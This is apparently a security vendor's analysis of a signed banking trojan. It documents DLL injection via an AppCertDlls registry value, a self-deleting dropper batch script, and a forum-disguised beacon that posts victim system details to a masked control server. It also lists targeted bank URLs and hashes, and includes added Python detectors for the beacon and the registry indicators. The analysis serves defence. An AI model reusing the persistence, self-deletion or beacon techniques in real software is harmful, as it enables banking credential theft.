
As part of Comodo Labs’ ongoing analysis of digitally signed “malware” (a digital signature confirms the software author and guarantees that the program code hasn’t been altered or corrupted since it was signed; malware is software used or created to disrupt computer operation, gather sensitive information, or gain access to computer systems), we recently discovered a new sample which uses an interesting and potentially devastating combination of techniques to deliver its “payload” (the malicious cargo carried by a data transmission).

Starting with a digitally signed “dropper” (installation program), the malware was able to inject itself into Windows “processes” (instances of computer programs being executed); bypass the “firewall” (which protects against threats from the public Internet) and “host intrusion protection mechanisms” (which monitor a single computer for suspicious activity by analyzing events occurring within it); send user details to a control “server” (computer hardware dedicated to running one or more services); download additional “configuration files” (which set the initial parameters of a program); and finally direct its victims to “phishing” websites (designed to look like other websites in an attempt to steal users’ personal information) which request the user’s banking usernames and passwords. This document contains a detailed description of our observations.

The dropper (installer) component of the malware was digitally signed with a certificate issued by a trusted Certificate Authority. Because the installer was ‘trusted’, it was able to evade detection by the heuristic and Host Intrusion Protection System (HIPS) components of many popular antivirus and Internet Security programs.


Upon execution, the dropper first determines the architecture of the Windows operating system (32-bit or 64-bit) then extracts the appropriate main module from “PE” (Portable Executable) file resources.


The file name of this main module is generated by concatenating name fragments from two random “*.exe” (Windows executable) files in the Windows system folder. For example, “diskpart.exe” (Windows text-mode command interpreter) and “eventvwr.exe” (Microsoft Event Viewer) generate the file name “disktvwr.dll”.

The main module is the PE “DLL” (Dynamic Link Library of functions and other information that can be accessed by a Windows program) which is placed in the Windows system folder under this generated name. It is then injected into the operating system process “explorer.exe” (Windows Explorer).


It is configured for automatic injection into most operating system processes and user applications via a randomly named value under the little-known “AppCertDlls” Windows Registry key (a key is similar to a folder):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"


As a result, the function “CreateProcessNotify”, exported by the malware “module” (a portion of the program that carries out a specific function and may be used alone or combined with other modules of the same program), is called each time a new process is created. This causes the malware DLL to be injected into most operating system processes and user applications.

After this operation, the dropper removes itself via the execution of a simple “DOS” (Disk Operating System) “BAT” (batch) script file:

1342562.bat:
rem %1 is the path of the dropper executable; %0 is this script itself
attrib -s -r -h %1
:hkiflg
rem retry the delete until the dropper process has exited and the file is gone
del %1
if exist %1 goto hkiflg
del %0


The main module is injected into the “explorer.exe” process and acts as a server application. It opens a “pipe” (a named temporary software connection between two programs or commands) whose name is a 128-bit Unique ID (UID), for example “\\.\pipe\{b2459e76-035d-2d18-0a97-debbcce1c0a5}”, and waits for incoming messages. Modules injected into other system processes and user applications act as “clients” (applications or systems that access a service made available by a server) and communicate with the server via the named pipe.


Modules injected into the “iexplore.exe” (Microsoft Internet Explorer) and “firefox.exe” (Mozilla Firefox) web browser processes are used for communication with the remote control server. This tricks firewall and HIPS technology, because the network activity generated by the malware appears to have been initiated by the user. The current version of the malware does not support other browsers such as “chrome.exe” (Google Chrome), “opera.exe” (Opera) and “safari.exe” (Apple Safari). To work around this, it prevents these browsers from opening and forces the user to use one of the supported browsers instead.

The malware communicates with its remote control server by imitating access to a forum topic. Initially it sends an “HTTP” (Hypertext Transfer Protocol) “POST” (a request method asking the web server to accept and store the data enclosed in the request body) to a “URL” (Uniform Resource Locator, the global address of a web page on the World Wide Web) of the following format:

http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c


…with the request body containing basic information about the user’s system and the installed malware module:

user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin
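The beacon described above has three features a defender can key on: a POST to a forum “viewtopic” page that browsers normally fetch with GET, the non-standard “sid5” query parameter carrying a 32-character hex value, and a request body made of the fixed field set shown above. The following detector is an added example, not code from the article or from Comodo; it runs over a few constructed proxy records of the form (method, URL, body). The article masks the server address, so the documentation address 203.0.113.10 stands in for it, while the query string and body of the matching record are copied from the article.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Body fields the article shows in the beacon's initial POST request.
BEACON_FIELDS = {"user_id", "version_id", "socks", "build", "crc", "win", "arch", "user"}
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)

# Constructed records in the shape a proxy with request-body logging produces:
# (method, url, body). 203.0.113.10 is a placeholder for the masked server IP;
# the second record's query and body are the ones quoted in the article.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("GET", "http://forum.example.net/viewtopic.php?f=3&t=42&sid=0123456789abcdef0123456789abcdef", ""),
    ("POST", "http://203.0.113.10/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c",
     "user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&"
     "win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin"),
    ("POST", "http://forum.example.net/posting.php?mode=reply&f=3&t=42", "subject=Re&message=hello"),
    ("POST", "http://203.0.113.10/viewtopic.php?f=1&t=2&sid5=deadbeef", "user_id=1&socks=0"),
]


def classify(method: str, url: str, body: str) -> List[str]:
    """Return the reasons a request resembles the beacon; an empty list means no match."""
    reasons: List[str] = []
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if method.upper() == "POST" and parts.path.lower().endswith("/viewtopic.php"):
        # A forum's topic view is a read-only page; browsers request it with GET.
        reasons.append("POST to viewtopic.php")
    sid5 = query.get("sid5", [""])[0]
    if sid5:
        # Forum session IDs normally travel in 'sid'; 'sid5' is the beacon's own parameter.
        reasons.append("sid5 parameter" + (" with 32-hex value" if HEX32.match(sid5) else ""))
    overlap = set(parse_qs(body, keep_blank_values=True)) & BEACON_FIELDS
    if len(overlap) >= 4:
        # Require most of the fixed field set so an unrelated form post with a
        # 'user' field does not trigger on its own.
        reasons.append(f"{len(overlap)} of {len(BEACON_FIELDS)} beacon body fields")
    return reasons


def scan(requests: List[Tuple[str, str, str]]) -> List[Tuple[str, List[str]]]:
    """Run classify() over proxy records and return the flagged URLs with their reasons."""
    flagged = []
    for method, url, body in requests:
        reasons = classify(method, url, body)
        if reasons:
            flagged.append((url, reasons))
    return flagged


if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_REQUESTS):
        print(url)
        for reason in reasons:
            print("   -", reason)
```

The legitimate forum GET and the reply form post produce no reasons; the article's beacon produces all three, and the last record (a POST to viewtopic.php with a malformed sid5 and only two body fields) produces two, which is how a partial or updated variant would surface for manual review rather than being dropped.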


It then receives an updated configuration file from the remote server. The malware stores the configuration and version information in a Windows Registry key named with a 128-bit UID, in the same way as the named pipe:

[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}]
"k1"=dword:b12564d0
"k2"=dword:473d87bb
"Version"=dword:0000002a
"Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\
...
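Both registry artifacts described on this page, the AppCertDlls value that triggers the injection and the GUID-named key under HKCU\Software\AppDataLow that holds the configuration, can be audited from a plain “.reg” export, which is the format the article quotes them in. The following parser and audit are an added example, not code from the article or from Comodo. The export it reads is constructed: the AppCertDlls value and the AppDataLow key reproduce the article's entries (the hex “Data” blob is truncated and padded with constructed bytes), and two benign keys are included so the audit has something to pass over.

```python
import re
from typing import Dict, List, Tuple

# Constructed .reg export. The first and third keys reproduce the article's two
# indicators; the Run and Internet Explorer keys are benign filler.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"

[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}]
"k1"=dword:b12564d0
"k2"=dword:473d87bb
"Version"=dword:0000002a
"Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\
  00,00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\Internet Explorer]
"Version"=dword:00000001
"""

GUID_RE = re.compile(r"^\{[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg export into {key_path: {value_name: value}}.

    Lines ending in a backslash (long hex: data) are joined with the next line,
    and quoted string values are unescaped so file paths read naturally."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    pending = ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is not None and "=" in line:
            name, value = line.split("=", 1)
            if value.startswith('"') and value.endswith('"'):
                value = value[1:-1].replace("\\\\", "\\")
            keys[current][name.strip('"')] = value
    return keys


def audit_keys(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (indicator, key_path, detail) for each registry indicator found."""
    findings: List[Tuple[str, str, str]] = []
    for path, values in keys.items():
        lower = path.lower()
        leaf = path.rsplit("\\", 1)[-1]
        if lower.endswith(r"\control\session manager\appcertdlls"):
            # Every DLL named here is loaded into any process that creates a
            # child process; on a normal workstation the key is empty or absent.
            for name, value in values.items():
                findings.append(("AppCertDlls entry", path, f"{name} -> {value}"))
        elif r"\software\appdatalow\{" in lower and GUID_RE.match(leaf):
            # A GUID-named key directly under AppDataLow holding dword/hex blobs
            # matches the configuration store described in the article.
            kinds = sorted({v.split(":", 1)[0] for v in values.values() if ":" in v})
            findings.append(("GUID-named AppDataLow key", path, "value types: " + ", ".join(kinds)))
    return findings


if __name__ == "__main__":
    for indicator, path, detail in audit_keys(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"[{indicator}] {path}\n    {detail}")
```

On a live host the same export is produced with `reg export HKLM\SYSTEM\CurrentControlSet\Control\Session` `Manager\AppCertDlls out.reg` (and likewise for HKCU\Software\AppDataLow); the audit treats any AppCertDlls value as a finding because legitimate software very rarely registers one, while the AppDataLow check is narrower and keys on the GUID naming plus binary value types.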


The primary purpose of this malware is to steal personal information such as bank information or credit card accounts. This is a list of URLs monitored by the malware according to a recent configuration file:

bankofamerica.com/accounts-overview/accounts-overview.go
bankofamerica.com/login/sign-in/signOnScreen.go
bankofamerica.com/login/sign-in/validatePassword.go
bankofamerica.com/myaccounts/
barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp
billmelater.com/login/challenge.xhtml
billmelater.com/your-account/home.xhtml
bofa.com
chaseonline.chase.com/gw/secure/ena
chaseonline.chase.com/MyAccounts.aspx
chaseonline.chase.com/secure/Profile/UpdateContactInfo/UpdateContact.aspx
client.schwab.com/Accounts/
client.schwab.com/Accounts/Summary/Summary.aspx
client.schwab.com/Service/MyProfile/MailingAddress.aspx
consumercenter.gogecapital.com/consumercenter/homeaction.do
discovercard.com/cardmembersvcs/achome/homepage
mbwebexpress.blilk.com/Core/Authentication/MFAPassword.aspx
mfasa.chase.com/auth/auth-stoken-osl.html
online.americanexpress.com/myca/acctmgmt/
online.citibank.com
online.wellsfargo.com/das/cgi-bin/session.cgi
onlinebanking.pnc.com/
onlinebanking.tdbank.com/login.asp
paypal.com/us/cgi-bin/webscr?cmd=_account
paypal.com/us/cgi-bin/webscr?cmd=_login-done
safe.bankofamerica.com/myaccounts/accounts-overview/accounts-overview.go
safe.bankofamerica.com/myaccounts/brain/redirect.go
safe.bankofamerica.com/myaccounts/signin/signIn.go?isSecureMobil
servicing.capitalone.com/C1/Accounts/Summary.aspx
shop.aafes.com/shop/Login.aspx
shopmyexchange.com
sitekey.bankofamerica.com/sas/signon.do
sitekey.bankofamerica.com/sas/signonSetup.do
sitekey.bankofamerica.com/sas/verifyImage.do
ss2.experian.com/securecontrol/reset/ssphome
suntrust.com/portal/server.pt
us.etrade.com/e/t/accounts/accountsCombo
us.hsbc.com/1/2/!ut/
wwws.ameritrade.com/cgi-bin/apps/SecurityChallenge


Once a user accesses one of the monitored URLs, the malware generates a phishing page which asks the user to enter their account details (including user name, password and credit card number) under the pretense of either recovering their account password or enabling additional security measures.


File information:

Dropper EXE:
Size: 285264
SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x86 DLL:
Size: 88576
SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x64 DLL:
Size: 98304
SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f
Signature: TrojWare.Win32.TrojanSpy.Volisk.a


Diagnosis, Removal & Protection Instructions

If your computer doesn’t have an antivirus or Internet Security program installed and you believe it may have been infected by “malware” (malicious software):

1. Download Comodo Antivirus and perform a full scan with an up-to-date antivirus database.
2. Remove the malware found by choosing from the recommended options, and stay protected.
